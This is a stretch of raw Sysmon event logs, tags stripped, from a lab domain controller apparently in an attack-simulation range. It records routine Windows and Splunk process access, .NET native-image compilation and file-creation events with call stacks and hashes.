21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:56.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022567Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.921{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022566Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.922{4DB9351A-A270-60D3-2905-00000000CF01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000022565Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.874{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=685880425FC5B17587A452659B83918F,SHA256=A7EF0E7C4396E3C680EFA629DD7986A309F740FD3752839C5BCA2EC59663C427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022564Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.343{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E017C0A75B8D6D9C5AC61363F569CA30,SHA256=586E924CC2015EAF0308721D8C54944B6062BD1AFF005806AB86C50AE6BEB66F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022563Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.296{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022562Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022561Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:56.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A270-60D3-2805-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022560Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.249{4DB9351A-A26F-60D3-2705-00000000CF01}5968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6O9LUCW441\WindowsBase.ni.dll.auxMD5=A6A87CBEFC959B346242D2CD52C8BA78,SHA256=80C6FFD063CD5359633AE280A57EBCE36C17726FA41D21CC62C37C7084A71DD0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.249{4DB9351A-A26F-60D3-2705-00000000CF01}5968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6O9LUCW441\WindowsBase.ni.dllMD5=6432BA5DEE912DF8D8CAD0CFB879ED87,SHA256=466A529CF4D304F15629075BCDE49BB51C19DC85E0C21D02B05448885B0CBCDA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:56.046{4DB9351A-A26F-60D3-2605-00000000CF01}63845552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.966{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.950{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.935{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-3205-00000000CF01}6536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.935{4DB9351A-A271-60D3-3105-00000000CF01}3840NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3XMY41LF9X\dfsvc.ni.exe.auxMD5=738471E1BCCDE3B58674AF57707847EF,SHA256=A733736401B309E1A14101FD084E5E4CCC5BD969CCCB5BB2194F8E9C34ADB267,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.935{4DB9351A-A271-60D3-3105-00000000CF01}3840NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3XMY41LF9X\dfsvc.ni.exeMD5=708B0FC7ABCBA69B30D443BC028F10C0,SHA256=CCFC9EF2A7026DE1DDEDFBAA8BD380D4FFC1D423DCB6C787629E5CCA1BF67A34,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.919{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.888{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.888{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-3105-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.872{4DB9351A-A271-60D3-2F05-00000000CF01}6720NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\33H4SF12QO\DfsrAdmin.ni.exe.auxMD5=B9964912E299D3884D7DFE627C05C3A1,SHA256=771106FDFB9B90FEDE222D569626180DE7555444D188D5C37BD17FE1EE9C3744,IMPHASH=00000000000000000000000000000000falsetrue 
21:06:57.530{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A271-60D3-2E05-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-A271-60D3-2D05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\87864XVE90\ComSvcConfig.ni.exe.auxMD5=223EBCDE576BDD160225EA3C3EE9C47E,SHA256=F7B511900ED461BAD0917F9269C59E50CF0D2C4BBA417684CF1BF742D8BB9646,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.530{4DB9351A-A271-60D3-2D05-00000000CF01}7116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\87864XVE90\ComSvcConfig.ni.exeMD5=DD58353AC9774C7A6954EC1E19E970AE,SHA256=24F14788363EA0F19CF859207F05AEC7D60AC8173A8133C637114B46079D46D9,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:57.515{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
